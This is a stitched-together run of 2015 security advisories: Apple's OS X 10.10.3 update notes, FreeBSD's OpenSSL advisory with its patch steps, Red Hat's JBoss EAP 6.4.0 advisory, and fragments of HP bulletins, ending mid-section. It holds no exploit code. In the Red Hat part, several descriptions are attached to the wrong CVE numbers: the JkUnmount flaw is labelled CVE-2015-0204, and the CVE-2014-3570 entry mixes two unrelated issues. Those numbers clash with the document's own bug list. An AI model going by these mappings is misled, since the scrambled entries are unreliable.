ATS Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: Multiple input validation issues existed in fontd. These issues were addressed through improved input validation. CVE-ID CVE-2015-1131 : Ian Beer of Google Project Zero CVE-2015-1132 : Ian Beer of Google Project Zero CVE-2015-1133 : Ian Beer of Google Project Zero CVE-2015-1134 : Ian Beer of Google Project Zero CVE-2015-1135 : Ian Beer of Google Project Zero
Certificate Trust Policy Impact: Update to the certificate trust policy Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork HTTPProtocol Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Cookies belonging to one origin may be sent to another origin Description: A cross-domain cookie issue existed in redirect handling. Cookies set in a redirect response could be passed on to a redirect target belonging to another origin. The issue was address through improved handling of redirects. CVE-ID CVE-2015-1089 : Niklas Keller
CFNetwork Session Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Authentication credentials may be sent to a server on another origin Description: A cross-domain HTTP request headers issue existed in redirect handling. HTTP request headers sent in a redirect response could be passed on to another origin. The issue was addressed through improved handling of redirects. CVE-ID CVE-2015-1091 : Diego Torres (http://dtorres.me)
CFURL Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: An input validation issue existed within URL processing. This issue was addressed through improved URL validation. CVE-ID CVE-2015-1088 : Luigi Galli
CoreAnimation Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A use-after-free issue existed in CoreAnimation. This issue was addressed through improved mutex management. CVE-ID CVE-2015-1136 : Apple
FontParser Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: Multiple memory corruption issues existed in the processing of font files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1093 : Marc Schoenefeld
Graphics Driver Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A NULL pointer dereference existed in NVIDIA graphics driver's handling of certain IOService userclient types. This issue was addressed through additional context validation. CVE-ID CVE-2015-1137 : Frank Graziano and John Villamil of the Yahoo Pentest Team
Hypervisor Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local application may be able to cause a denial of service Description: An input validation issue existed in the hypervisor framework. This issue was addressed through improved input validation. CVE-ID CVE-2015-1138 : Izik Eidus and Alex Fishman
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted .sgi file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of .sgi files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1139 : Apple
IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A malicious HID device may be able to cause arbitrary code execution Description: A memory corruption issue existed in an IOHIDFamily API. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1095 : Andrew Church
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow issue existed in IOHIDFamily. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1140 : lokihardt@ASRT working with HP's Zero Day Initiative, Luca Todesco
IOHIDFamily Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to determine kernel memory layout Description: An issue existed in IOHIDFamily that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1096 : Ilja van Sprundel of IOActive
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A heap buffer overflow existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved bounds checking. CVE-ID CVE-2014-4404 : Ian Beer of Google Project Zero
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A null pointer dereference existed in IOHIDFamily's handling of key-mapping properties. This issue was addressed through improved validation of IOHIDFamily key-mapping properties. CVE-ID CVE-2014-4405 : Ian Beer of Google Project Zero
IOHIDFamily Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5 Impact: A user may be able to execute arbitrary code with system privileges Description: An out-of-bounds write issue exited in the IOHIDFamily driver. The issue was addressed through improved input validation. CVE-ID CVE-2014-4380 : cunzhang from Adlab of Venustech
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system shutdown Description: An issue existed in the handling of virtual memory operations within the kernel. The issue is fixed through improved handling of the mach_vm_read operation. CVE-ID CVE-2015-1141 : Ole Andre Vadla Ravnas of www.frida.re
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause a system denial of service Description: A race condition existed in the kernel's setreuid system call. This issue was addressed through improved state management. CVE-ID CVE-2015-1099 : Mark Mentovai of Google Inc.
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local application may escalate privileges using a compromised service intended to run with reduced privileges Description: setreuid and setregid system calls failed to drop privileges permanently. This issue was addressed by correctly dropping privileges. CVE-ID CVE-2015-1117 : Mark Mentovai of Google Inc.
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to redirect user traffic to arbitrary hosts Description: ICMP redirects were enabled by default on OS X. This issue was addressed by disabling ICMP redirects. CVE-ID CVE-2015-1103 : Zimperium Mobile Security Labs
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: An attacker with a privileged network position may be able to cause a denial of service Description: A state inconsistency existed in the processing of TCP headers. This issue was addressed through improved state handling. CVE-ID CVE-2015-1102 : Andrey Khudyakov and Maxim Zhuravlev of Kaspersky Lab
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause unexpected system termination or read kernel memory Description: A out of bounds memory access issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1100 : Maxime Villard of m00nbsd
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to bypass network filters Description: The system would treat some IPv6 packets from remote network interfaces as local packets. The issue was addressed by rejecting these packets. CVE-ID CVE-2015-1104 : Stephen Roettger of the Google Security Team
Kernel Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1101 : lokihardt@ASRT working with HP's Zero Day Initiative
Kernel Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may be able to cause a denial of service Description: A state inconsistency issue existed in the handling of TCP out of band data. This issue was addressed through improved state management. CVE-ID CVE-2015-1105 : Kenton Varda of Sandstorm.io
LaunchServices Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to cause the Finder to crash Description: An input validation issue existed in LaunchServices's handling of application localization data. This issue was addressed through improved validation of localization data. CVE-ID CVE-2015-1142
LaunchServices Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A type confusion issue existed in LaunchServices's handling of localized strings. This issue was addressed through additional bounds checking. CVE-ID CVE-2015-1143 : Apple
libnetcore Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Processing a maliciously crafted configuration profile may lead to unexpected application termination Description: A memory corruption issue existed in the handling of configuration profiles. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-1118 : Zhaofeng Chen, Hui Xue, Yulong Zhang, and Tao Wei of FireEye, Inc.
ntp Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A remote attacker may brute force ntpd authentication keys Description: The config_auth function in ntpd generated a weak key when an authentication key was not configured. This issue was addressed by improved key generation. CVE-ID CVE-2014-9298
OpenLDAP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A remote unauthenticated client may be able to cause a denial of service Description: Multiple input validation issues existed in OpenLDAP. These issues were addressed by improved input validation. CVE-ID CVE-2015-1545 : Ryan Tandy CVE-2015-1546 : Ryan Tandy
OpenSSL Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL 0.9.8zc, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers. These issues were addressed by updating OpenSSL to version 0.9.8zd. CVE-ID CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8275 CVE-2015-0204
Open Directory Client Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A password might be sent unencrypted over the network when using Open Directory from OS X Server Description: If an Open Directory client was bound to an OS X Server but did not install the certificates of the OS X Server, and then a user on that client changed their password, the password change request was sent over the network without encryption. This issue was addressed by having the client require encryption for this case. CVE-ID CVE-2015-1147 : Apple
PHP Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Multiple vulnerabilities in PHP Description: Multiple vulnerabilities existed in PHP versions prior to 5.3.29, 5.4.38, and 5.5.20, including one which may have led to arbitrary code execution. This update addresses the issues by updating PHP to versions 5.3.29, 5.4.38, and 5.5.20. CVE-ID CVE-2013-6712 CVE-2014-0207 CVE-2014-0237 CVE-2014-0238 CVE-2014-2497 CVE-2014-3478 CVE-2014-3479 CVE-2014-3480 CVE-2014-3487 CVE-2014-3538 CVE-2014-3587 CVE-2014-3597 CVE-2014-3668 CVE-2014-3669 CVE-2014-3670 CVE-2014-3710 CVE-2014-3981 CVE-2014-4049 CVE-2014-4670 CVE-2014-4698 CVE-2014-5120
QuickLook Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Opening a maliciously crafted iWork file may lead to arbitrary code execution Description: A memory corruption issue existed in the handling of iWork files. This issue was addressed through improved memory handling. CVE-ID CVE-2015-1098 : Christopher Hickstein
SceneKit Available for: OS X Mountain Lion v10.8.5 Impact: Viewing a maliciously crafted Collada file may lead to arbitrary code execution Description: A heap buffer overflow existed in SceneKit's handling of Collada files. Viewing a maliciously crafted Collada file may have led to arbitrary code execution. This issue was addressed through improved validation of accessor elements. CVE-ID CVE-2014-8830 : Jose Duart of Google Security Team
Screen Sharing Available for: OS X Yosemite v10.10 to v10.10.2 Impact: A user's password may be logged to a local file Description: In some circumstances, Screen Sharing may log a user's password that is not readable by other users on the system. This issue was addressed by removing logging of credential. CVE-ID CVE-2015-1148 : Apple
Security - Code Signing Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: Tampered applications may not be prevented from launching Description: Applications containing specially crafted bundles may have been able to launch without a completely valid signature. This issue was addressed by adding additional checks. CVE-ID CVE-2015-1145 CVE-2015-1146
UniformTypeIdentifiers Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.2 Impact: A local user may be able to execute arbitrary code with system privileges Description: A buffer overflow existed in the way Uniform Type Identifiers were handled. This issue was addressed with improved bounds checking. CVE-ID CVE-2015-1144 : Apple
WebKit Available for: OS X Yosemite v10.10 to v10.10.2 Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: A memory corruption issue existed in WebKit. This issues was addressed through improved memory handling. CVE-ID CVE-2015-1069 : lokihardt@ASRT working with HP's Zero Day Initiative
Security Update 2015-004 (available for OS X Mountain Lion v10.8.5 and OS X Mavericks v10.9.5) also addresses an issue caused by the fix for CVE-2015-1067 in Security Update 2015-002. This issue prevented Remote Apple Events clients on any version from connecting to the Remote Apple Events server. In default configurations, Remote Apple Events is not enabled.
OS X Yosemite 10.10.3 includes the security content of Safari 8.0.5. https://support.apple.com/en-us/HT204658
OS X Yosemite 10.10.3 and Security Update 2015-004 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - http://gpgtools.org
iQIcBAEBAgAGBQJVJKj2AAoJEBcWfLTuOo7tDh4QAK0LxfwMRKcdOXOKpXsRz6lg lhZ+CLVcSepq8qBkFQ74f3B5CuhxD0IGQPaAuSXl51tWYdfN+92tkbmyZ9k8901l +I0vw6upeE+oqRnGtSRzq68UhcARbdV8V1+C0Xl3IIuuHc+xlEgvklDhF9Pc8XM6 DudGiVNqt6MOqd5Oc4s4FFF0nnpnyG9+UJem3mi4Ee88PwI4x1Hev7utPPmaPDzj cjkVeislko3QArNJxtBpkYudErA4eR5OX8Tdf12jAmPTtjrXUb3VigEf78Nna0RW kHTOGdB5EZ+YFZ8KlyIQlENBjTtI8CGdCF4/S/2xDN83NTRsimd5Y7LSjdd0uANo pqxAc3Gzn5xngWF1Qbb6V+XZBfz5NoeTq5BXBB5OHz4PSGaQuMsBA2RYFMzNLqWv D/T5U1JtzRLALt0lYAz63B0OhW7KXeLI9oer1Vo4wWF9O9cUFyuSI4JU5uYLQpJX kEpSFt4YPFFxMnlzCLzLkmVGax4w9M/tRHYeSKAnRlnsoPBtIGFItlNZE2RduD/R 5n2APoJa3banQ8miycGORYP3WsktDRZzBy+2QPWuz8sE3AvAkO9xWp8PrQBkqf/b 6CIG5UkCYITG2uzBXqnGbfDiEDvBLNN1Yq0ZZI23iYRxrdW0I0pv1CHio354q12G vVE37tYUU4PnLfwlcazq =MOsT -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512
============================================================================= FreeBSD-SA-15:01.openssl Security Advisory The FreeBSD Project
Topic: OpenSSL multiple vulnerabilities
Category: contrib Module: openssl Announced: 2015-01-14 Affects: All supported versions of FreeBSD. Corrected: 2015-01-09 00:58:20 UTC (stable/10, 10.1-STABLE) 2015-01-14 21:27:46 UTC (releng/10.1, 10.1-RELEASE-p4) 2015-01-14 21:27:46 UTC (releng/10.0, 10.0-RELEASE-p16) 2015-01-09 01:11:43 UTC (stable/9, 9.3-STABLE) 2015-01-14 21:27:46 UTC (releng/9.3, 9.3-RELEASE-p8) 2015-01-09 01:11:43 UTC (stable/8, 8.4-STABLE) 2015-01-14 21:27:46 UTC (releng/8.4, 8.4-RELEASE-p22) CVE Name: CVE-2014-3571, CVE-2015-0206, CVE-2014-3569, CVE-2014-3572 CVE-2015-0204, CVE-2015-0205, CVE-2014-8275, CVE-2014-3570
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
I. Background
FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is a collaborative effort to develop a robust, commercial-grade, full-featured Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols as well as a full-strength general purpose cryptography library.
II. Problem Description
A carefully crafted DTLS message can cause a segmentation fault in OpenSSL due to a NULL pointer dereference. [CVE-2014-3571]
A memory leak can occur in the dtls1_buffer_record function under certain conditions. [CVE-2015-0206]
When OpenSSL is built with the no-ssl3 option and a SSL v3 ClientHello is received the ssl method would be set to NULL which could later result in a NULL pointer dereference. [CVE-2014-3569] This does not affect FreeBSD's default build.
An OpenSSL client will accept a handshake using an ephemeral ECDH ciphersuite using an ECDSA certificate if the server key exchange message is omitted. [CVE-2014-3572]
An OpenSSL client will accept the use of an RSA temporary key in a non-export RSA key exchange ciphersuite. [CVE-2015-0204]
An OpenSSL server will accept a DH certificate for client authentication without the certificate verify message. [CVE-2015-0205]
OpenSSL accepts several non-DER-variations of certificate signature algorithm and signature encodings. OpenSSL also does not enforce a match between the signature algorithm between the signed and unsigned portions of the certificate. [CVE-2014-8275]
Bignum squaring (BN_sqr) may produce incorrect results on some platforms, including x86_64. [CVE-2014-3570]
III. Impact
An attacker who can send a carefully crafted DTLS message can cause server daemons that uses OpenSSL to crash, resulting a Denial of Service. [CVE-2014-3571]
An attacker who can send repeated DTLS records with the same sequence number but for the next epoch can exhaust the server's memory and result in a Denial of Service. [CVE-2015-0206]
A server can remove forward secrecy from the ciphersuite. [CVE-2014-3572]
A server could present a weak temporary key and downgrade the security of the session. [CVE-2015-0204]
A client could authenticate without the use of a private key. This only affects servers which trust a client certificate authority which issues certificates containing DH keys, which is extremely rare. [CVE-2015-0205]
By modifying the contents of the signature algorithm or the encoding of the signature, it is possible to change the certificate's fingerprint.
This does not allow an attacker to forge certificates, and does not affect certificate verification or OpenSSL servers/clients in any other way. It also does not affect common revocation mechanisms. Only custom applications that rely on the uniqueness of the fingerprint (e.g. certificate blacklists) may be affected. [CVE-2014-8275]
IV. Workaround
No workaround is available.
V. Solution
Perform one of the following:
1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date.
2) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility:
freebsd-update fetch
freebsd-update install
3) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.
[FreeBSD 8.4 and FreeBSD 9.3]
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-9.3.patch.asc
gpg --verify openssl-9.3.patch.asc
[FreeBSD 10.0]
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.0.patch.asc
gpg --verify openssl-10.0.patch.asc
[FreeBSD 10.1]
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch
fetch https://security.FreeBSD.org/patches/SA-15:01/openssl-10.1.patch.asc
gpg --verify openssl-10.1.patch.asc
b) Apply the patch. Execute the following commands as root:
cd /usr/src
patch < /path/to/patch
c) Recompile the operating system using buildworld and installworld as
described in
Restart all deamons using the library, or reboot the system.
VI. Correction details
The following list contains the correction revision numbers for each affected branch.
Branch/path Revision
stable/8/ r276865 releng/8.4/ r277195 stable/9/ r276865 releng/9.3/ r277195 stable/10/ r276864 releng/10.0/ r277195 releng/10.1/ r277195
To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed:
svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
VII. References
The latest revision of this advisory is available at
iQIcBAEBCgAGBQJUtuEaAAoJEO1n7NZdz2rnQCcP/A19v5HUUhjz5nMbUumRwAmB QCxNKEy6SbAuxtIwGNYJyyxKIK3R9vTHwlgyQZVb4q8FgMHcu4yABeRfov10mO5Q U7RkLOJyca6eqEngkrh+AFfbhqfxtccIMUQkDdegsQcqZd2Ya0VeNfjA8H0XIDoL JSEoCifmxjv6v8ZcpugahsUOBmEWx+vyHJUSPVSv/AsLubzV3hqi4iLpzLky3/dR 4LHGzPny07NkGPVqOBU7mjTs76SzCTS2c4NIVfvbphx8UojMvREbZ8ogCMEVGBXY fIWesi7Y6lhqbSgWj1EXyZF9NTo/Z4nr7Oh1ER5VSAfmhZAdyhEEEGQrg4Jq0VL3 DJ1Y35Up79xXmVjB14COxodI5UO+55wWnXb8r/zy/eh+wv0sHwlTz56wxo7SxAOa xOrQj0VJ7zghLhBO7azacbVYIKpfQkJafb7XRUOqu4wt2y3/jeL+0UkWJnNMROrq aQUB6SdGUVDwQsmodgF0rsGcQYXhaQBPu4KQo8yG8+rpqc2zewi537BJr/PWJvH0 sJ6yYcD7VGyIleVRDpxsg7uBWelnGn+AqHignbyUcic4j/N9lYlF00AVgka2TdOp i5eZtp7m95v53S4fEX2HGwWpOv+AfCrSKQZGpvdNx+9JyD3LyOvFBxs4k0oZWa6J 6FLFZ38YkLcUIzW6I6Kc =ztFk -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat JBoss Enterprise Application Platform 6.4.0 update Advisory ID: RHSA-2015:0849-01 Product: Red Hat JBoss Enterprise Application Platform Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-0849.html Issue date: 2015-04-16 CVE Names: CVE-2014-3570 CVE-2014-3586 CVE-2014-8111 CVE-2015-0204 CVE-2015-0226 CVE-2015-0227 CVE-2015-0277 =====================================================================
- Summary:
Updated packages that provide Red Hat JBoss Enterprise Application Platform 6.4.0, and fix multiple security issues, several bugs, and add various enhancements, are now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. Description:
Red Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.
It was found that a prior countermeasure in Apache WSS4J for Bleichenbacher's attack on XML Encryption (CVE-2011-2487) threw an exception that permitted an attacker to determine the failure of the attempted attack, thereby leaving WSS4J vulnerable to the attack. The original flaw allowed a remote attacker to recover the entire plain text form of a symmetric key. (CVE-2015-0226)
A flaw was found in the way PicketLink's Service Provider and Identity Provider handled certain requests. A remote attacker could use this flaw to log to a victim's account via PicketLink. (CVE-2015-0277)
It was discovered that a JkUnmount rule for a subtree of a previous JkMount rule could be ignored. This could allow a remote attacker to potentially access a private artifact in a tree that would otherwise not be accessible to them. (CVE-2015-0204)
It was found that Apache WSS4J permitted bypass of the requireSignedEncryptedDataElements configuration property via XML Signature wrapping attacks. A remote attacker could use this flaw to modify the contents of a signed request. This flaw could possibly affect certain OpenSSL library functionality, such as RSA blinding. Note that this issue occurred rarely and with a low probability, and there is currently no known way of exploiting it. (CVE-2014-3570)
It was found that the Command Line Interface, as provided by Red Hat Enterprise Application Platform, created a history file named .jboss-cli-history in the user's home directory with insecure default file permissions. This could allow a malicious local user to gain information otherwise not accessible to them. (CVE-2014-3586)
The CVE-2015-0277 issue was discovered by Ondrej Kotek of Red Hat.
This release of JBoss Enterprise Application Platform also includes bug fixes and enhancements. Documentation for these changes will be available shortly from the JBoss Enterprise Application Platform 6.4.0 Release Notes, linked to in the References.
All users of Red Hat JBoss Enterprise Application Platform 6.3 as provided from the Red Hat Customer Portal are advised to apply this update. The JBoss server process must be restarted for the update to take effect. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying this update, back up your existing Red Hat JBoss Enterprise Application Platform installation and deployed applications. Bugs fixed (https://bugzilla.redhat.com/):
1126687 - CVE-2014-3586 JBoss AS CLI: Insecure default permissions on history file 1180184 - CVE-2015-0204 openssl: only allow ephemeral RSA keys in export ciphersuites (FREAK) 1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results 1182591 - CVE-2014-8111 Tomcat mod_jk: information leak due to incorrect JkMount/JkUnmount directives processing 1191446 - CVE-2015-0226 wss4j: Apache WSS4J is vulnerable to Bleichenbacher's attack (incomplete fix for CVE-2011-2487) 1191451 - CVE-2015-0227 wss4j: Apache WSS4J doesn't correctly enforce the requireSignedEncryptedDataElements property 1194832 - CVE-2015-0277 PicketLink: SP does not take Audience condition of a SAML assertion into account
- References:
https://access.redhat.com/security/cve/CVE-2014-3570 https://access.redhat.com/security/cve/CVE-2014-3586 https://access.redhat.com/security/cve/CVE-2014-8111 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2015-0226 https://access.redhat.com/security/cve/CVE-2015-0227 https://access.redhat.com/security/cve/CVE-2015-0277 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=appplatform&version=6.4 https://access.redhat.com/documentation/en-US/JBoss_Enterprise_Application_Platform/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc.
Softpaq: http://ftp.hp.com/pub/softpaq/sp70501-71000/sp70649.exe
Easy Update Via ThinPro / EasyUpdate (x86):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.1-all- 4.4-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.0/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
http://ftp.hp.com/pub/tcdebian/updates/5.1/service_packs/security-sp-2.1-all- 5.0-5.1-x86.xar
Via ThinPro / EasyUpdate (ARM):
http://ftp.hp.com/pub/tcdebian/updates/4.1/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.2/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.3/service_packs/security-sp-2.0-all- 4.1-4.3-armel.xar
http://ftp.hp.com/pub/tcdebian/updates/4.4/service_packs/security-sp-2.0-all- 4.4-armel.xar
Note: Known issue on security-sp-2.0-all-4.1-4.3-arm.xar: With the patch applied, VMware cannot connect if security level is set to "Refuse insecure connections". Updating VMware to the latest package on ftp.hp.com will solve the problem.
References:
CVE-2014-8275 Cryptographic Issues (CWE-310) CVE-2014-3569 Remote Denial of Service (DoS) CVE-2014-3570 Cryptographic Issues (CWE-310) CVE-2014-3571 Remote Denial of Service (DoS) CVE-2014-3572 Cryptographic Issues (CWE-310) CVE-2015-0204 Cryptographic Issues (CWE-310) SSRT101934
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP SSL for OpenVMS: All versions prior to 1.4-502.
HP SSL 1.4-502 for OpenVMS (based on OpenSSL 0.9.8ze) is available from the following locations:
- HP SSL for OpenVMS website:
http://h71000.www7.hp.com/openvms/products/ssl/ssl.html
- HP Support Center website:
https://h20566.www2.hp.com/portal/site/hpsc/patch/home
Note: Login using your HP Passport account.
Release Date: 2015-08-24 Last Updated: 2015-08-24
Potential Security Impact: Remote unauthorized modification, unauthorized access, or unauthorized disclosure of information.
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Matrix Operating Environment. The vulnerabilities could be exploited remotely resulting in unauthorized modification, unauthorized access, or unauthorized disclosure of information.
References:
CVE-2010-5107 CVE-2013-0248 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2014-1692 CVE-2014-3523 CVE-2014-3569 CVE-2014-3570 CVE-2014-3571 CVE-2014-3572 CVE-2014-8142 CVE-2014-8275 CVE-2014-9427 CVE-2014-9652 CVE-2014-9653 CVE-2014-9705 CVE-2015-0204 CVE-2015-0205 CVE-2015-0206 CVE-2015-0207 CVE-2015-0208 CVE-2015-0209 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-0285 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0290 CVE-2015-0291 CVE-2015-0292 CVE-2015-0293 CVE-2015-1787 CVE-2015-1788 CVE-2015-1789 CVE-2015-1790 CVE-2015-1791 CVE-2015-1792 CVE-2015-2134 CVE-2015-2139 CVE-2015-2140 CVE-2015-2301 CVE-2015-2331 CVE-2015-2348 CVE-2015-2787 CVE-2015-3113 CVE-2015-5122 CVE-2015-5123 CVE-2015-5402 CVE-2015-5403 CVE-2015-5404 CVE-2015-5405 CVE-2015-5427 CVE-2015-5428 CVE-2015-5429 CVE-2015-5430 CVE-2015-5431 CVE-2015-5432 CVE-2015-5433
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Matrix Operating Environment impacted software components and versions:
HP Systems Insight Manager (SIM) prior to version 7.5.0 HP System Management Homepage (SMH) prior to version 7.5.0 HP Version Control Agent (VCA) prior to version 7.5.0 HP Version Control Repository Manager (VCRM) prior to version 7.5.0 HP Insight Orchestration prior to version 7.5.0 HP Virtual Connect Enterprise Manager (VCEM) prior to version 7.5.0
BACKGROUND
CVSS 2.0 Base Metrics
